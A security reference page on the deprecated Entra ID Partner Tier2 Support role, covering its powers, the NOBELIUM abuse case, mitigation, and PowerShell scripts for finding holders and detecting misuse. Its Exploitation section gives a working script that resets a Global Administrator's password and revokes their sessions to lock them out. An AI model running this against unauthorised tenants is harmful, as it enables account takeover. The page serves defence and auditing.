AZ_PARTNER_TIER2_SUPPORT

WARNING: This role is deprecated. Microsoft states: "Do not use - not intended for general use." Organizations should transition to Granular Delegated Admin Privileges (GDAP).

Summary

FSProtect ACL Alias: AZ_PARTNER_TIER2_SUPPORT
Entra ID (Azure AD) Alias: Partner Tier2 Support
Role Template ID: e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8
Affected Object Types: Users, Service Principals, Groups, Domains, Role Assignments
Exploitation Certainty: Certain
Graph Permission / Role: Membership in the Partner Tier2 Support directory role

Description

AZ_PARTNER_TIER2_SUPPORT represents the Partner Tier2 Support directory role in Microsoft Entra ID. This role was assigned to Microsoft Partner organizations through the Cloud Solution Provider (CSP) or Delegated Admin Privileges (DAP) programs.

Capabilities of Partner Tier2 Support:

  • Reset passwords for ALL users including Global Administrators

  • Invalidate refresh tokens for all users including admins

  • Full domain management (create, delete, update domains)

  • Manage role assignments (create/delete role assignments)

  • Manage user accounts including creation, modification, and deletion

  • Manage groups and group memberships

  • Update applications and credentials

  • Create and manage OAuth permission grants

Partner Tier2 vs Tier1 Support:

Capability                                   Tier1   Tier2
Reset passwords for non-admins               Yes     Yes
Reset passwords for admins (including GA)    No      Yes
Domain management                            No      Yes
Role assignment management                   No      Yes

Security Implications:

This role is extremely dangerous because:

  • Password reset for Global Admins: Apart from Global Administrator and Privileged Authentication Administrator, this is one of the very few roles that can reset a Global Administrator's password and revoke their sessions

  • External access: The role is held by principals from an external partner tenant

  • Nation-state abuse: NOBELIUM (APT29) abused DAP relationships to compromise multiple tenants

  • Cross-tenant trust: Actions are performed by entities outside your organizational control

  • Persistence: Partners may retain access even after business relationships end

  • Visibility gaps: Partner administrators sign in to their own tenant, so their sign-in events are recorded in the partner's sign-in logs, not yours; the customer tenant only sees the resulting directory changes in its audit log, with the partner user as the initiator

Identification

PowerShell (Microsoft Graph)

Find Partner Tier2 Support role assignments:

Check for all partner roles and GDAP relationships:
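The following is an added example (not code from the original page) that enumerates every principal holding the deprecated Partner Tier1 or Tier2 Support roles with the Microsoft Graph PowerShell SDK. It uses the published role template IDs and the unified role-assignment endpoint, which also returns assignments for roles that were never activated as a classic directoryRole object in this tenant. Partner (DAP/GDAP) relationships are not directory role assignments, so those still have to be reviewed in the Microsoft 365 admin center as described in the GUI steps.

```powershell
# Added example, not from the original page: list holders of the deprecated
# Partner Tier1/Tier2 Support roles via Microsoft Graph PowerShell
# (Microsoft.Graph.Identity.Governance module).
Connect-MgGraph -Scopes "RoleManagement.Read.Directory", "Directory.Read.All"

# Role template IDs from the Microsoft Entra built-in roles reference.
$partnerRoles = @{
    "Partner Tier1 Support" = "4ba39ca4-527c-499a-b93d-d9b492c50246"
    "Partner Tier2 Support" = "e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8"
}

$findings = foreach ($role in $partnerRoles.GetEnumerator()) {
    # For built-in roles the roleDefinitionId is the role template ID.
    $assignments = Get-MgRoleManagementDirectoryRoleAssignment -All `
        -Filter "roleDefinitionId eq '$($role.Value)'" `
        -ExpandProperty Principal

    foreach ($a in $assignments) {
        # The expanded principal is a generic directoryObject; its concrete
        # properties (type, name, UPN) live in AdditionalProperties.
        $p = $a.Principal.AdditionalProperties
        [pscustomobject]@{
            Role          = $role.Key
            PrincipalType = ($p['@odata.type'] -replace '#microsoft.graph.', '')
            DisplayName   = $p['displayName']
            UPN           = $p['userPrincipalName']
            PrincipalId   = $a.PrincipalId
            Scope         = $a.DirectoryScopeId   # "/" means tenant-wide
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    "No Partner Tier1/Tier2 Support role assignments found."
}
```

Any row returned by this script is a finding: neither role should be assigned in a customer tenant today. Treat a service principal or group holder with particular suspicion, since the role then flows to whatever can authenticate as that principal or join that group.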

Azure GUI

  1. Open Microsoft Entra admin center -> Roles & administrators

  2. Search for Partner Tier2 Support

  3. Check Assignments for any active members

  4. Also check Partner relationships:

    • Go to Microsoft 365 Admin Center -> Settings -> Partner relationships

    • Review all active partner access

Exploitation

A compromised partner account with Tier2 Support can take over any account in the tenant, including Global Administrators.

Real-world abuse: In 2021, NOBELIUM (APT29/Cozy Bear) targeted MSP/CSP partners and abused DAP relationships to pivot into multiple customer tenants.

PowerShell (Microsoft Graph)

Reset a Global Administrator's password:

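The following is an added example (not code from the original page) showing the two Graph operations the role grants over administrators, a password reset followed by refresh-token invalidation, carried out against a Global Administrator with the Microsoft Graph PowerShell SDK. The target UPN is a placeholder; run this only in a tenant you own or are authorised to test.

```powershell
# Added example, not from the original page: what a principal holding Partner
# Tier2 Support can do to a Global Administrator. The target UPN is a
# placeholder for an account in a tenant you are authorised to test.
Connect-MgGraph -Scopes "Directory.AccessAsUser.All"

$targetUpn = "ga-admin@contoso.onmicrosoft.com"   # placeholder target
$target    = Get-MgUser -UserId $targetUpn -Property Id, UserPrincipalName

# Generate a random password instead of hard-coding one.
$bytes = New-Object byte[] 24
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
$newPassword = [Convert]::ToBase64String($bytes)

# microsoft.directory/users/password/update: resets the GA's password.
# Outside this role, only Global Administrator and Privileged Authentication
# Administrator can do this to a Global Administrator.
Update-MgUser -UserId $target.Id -PasswordProfile @{
    Password                      = $newPassword
    ForceChangePasswordNextSignIn = $false
}

# microsoft.directory/users/invalidateAllRefreshTokens: revokes every existing
# session so the legitimate admin is locked out and only the new password works.
Revoke-MgUserSignInSession -UserId $target.Id

"Password reset for $($target.UserPrincipalName); existing sessions revoked."
```

Both calls are ordinary directory writes, so they are recorded in the customer tenant's audit log as "Reset user password" and a session revocation initiated by the partner user; the detection section below is built around exactly those entries.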

Common Abuse Patterns

  • Reset Global Admin password and lock out legitimate administrators

  • Create new admin accounts for persistence

  • Modify OAuth app permissions for data exfiltration

  • Pivot from one compromised partner to multiple customer tenants

Mitigation

  • Transition from DAP to GDAP: Migrate to Granular Delegated Admin Privileges for time-bound, least-privilege access

    • Go to Microsoft 365 Admin Center -> Settings -> Partner relationships

    • Set maximum duration (recommend 90 days or less)

  • Review partner relationships regularly:

    • Audit which partners have access to your tenant

    • Remove partner relationships no longer needed

    • Verify partner identity before approving GDAP requests

  • Never grant Partner Tier2 Support under GDAP:

    • Use least-privilege roles (Helpdesk Administrator, User Administrator)

    • Avoid granting password reset capability over admin accounts

  • Monitor partner actions:

    • Review audit logs for actions by partner accounts

    • Alert on password resets by external principals

    • Monitor cross-tenant sign-ins

  • Require MFA for partner access: Ensure partners use phishing-resistant MFA

Detection

Detect partner access and actions in Audit logs.

PowerShell (Microsoft Graph)
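The following is an added example (not code from the original page) that pulls the last 30 days of password resets, user updates and role-membership additions from the Entra audit log and flags those initiated from outside the tenant or aimed at a Global Administrator. It assumes, as the page does, that partner-initiated changes appear in the customer audit log with the partner user as the initiator; since partner users belong to the partner's tenant, their UPN domain is not one of this tenant's verified domains, which the script uses as a heuristic for "external actor" (it will also flag guests and other cross-tenant actors). The Global Administrator template ID used is the published one.

```powershell
# Added example, not from the original page: flag audit-log entries initiated
# by an account outside this tenant's verified domains or targeting a Global
# Administrator, using Microsoft Graph PowerShell.
Connect-MgGraph -Scopes "AuditLog.Read.All", "Directory.Read.All"

$since = (Get-Date).ToUniversalTime().AddDays(-30).ToString("yyyy-MM-ddTHH:mm:ssZ")
$activities = "Reset user password", "Update user", "Add member to role"

# Verified domains of this tenant. Heuristic: an initiator whose UPN domain is
# not in this list is treated as external (partner, guest or cross-tenant).
$ourDomains = (Get-MgDomain -All | Where-Object IsVerified).Id

# Current Global Administrators (role template 62e90394-69f5-4237-9190-012177145e10).
$gaRole = Get-MgDirectoryRole -Filter "roleTemplateId eq '62e90394-69f5-4237-9190-012177145e10'"
$gaIds  = @()
if ($gaRole) { $gaIds = @((Get-MgDirectoryRoleMember -DirectoryRoleId $gaRole.Id -All).Id) }

$alerts = foreach ($activity in $activities) {
    $events = Get-MgAuditLogDirectoryAudit -All `
        -Filter "activityDisplayName eq '$activity' and activityDateTime ge $since"

    foreach ($e in $events) {
        $actorUpn = $e.InitiatedBy.User.UserPrincipalName
        $actorDom = if ($actorUpn) { ($actorUpn -split '@')[-1] } else { $null }
        $external = [bool]($actorUpn -and ($ourDomains -notcontains $actorDom))

        # First target resource is the affected user for these activities.
        $target = $e.TargetResources | Select-Object -First 1
        $hitsGA = [bool]($target -and ($gaIds -contains $target.Id))

        if ($external -or $hitsGA) {
            [pscustomobject]@{
                Time          = $e.ActivityDateTime
                Activity      = $e.ActivityDisplayName
                Actor         = if ($actorUpn) { $actorUpn } else { $e.InitiatedBy.App.DisplayName }
                ExternalActor = $external
                Target        = $target.UserPrincipalName
                TargetIsGA    = $hitsGA
                Result        = $e.Result
            }
        }
    }
}

$alerts | Sort-Object Time -Descending | Format-Table -AutoSize
```

Every row matches at least one of the alert criteria listed below; a row with both ExternalActor and TargetIsGA set is the signature of the takeover described in the Exploitation section and should page someone. For continuous coverage, feed the same audit events into your SIEM rather than polling from a workstation.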

Azure GUI

  • Go to Microsoft Entra ID -> Audit logs

  • Filter by:

    • Initiated by (actor): Look for external partner principals

    • Activity: Reset password, Update user, Add member to role

Alert Criteria

  • Password resets by Partner Tier2 Support accounts

  • Password resets targeting administrator accounts

  • User modifications by external principals

  • New partner role assignments

  • Cross-tenant sign-ins during unusual hours

References

  • https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference

  • https://learn.microsoft.com/en-us/partner-center/gdap-introduction

  • https://learn.microsoft.com/en-us/microsoft-365/commerce/manage-partners

  • https://www.microsoft.com/en-us/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
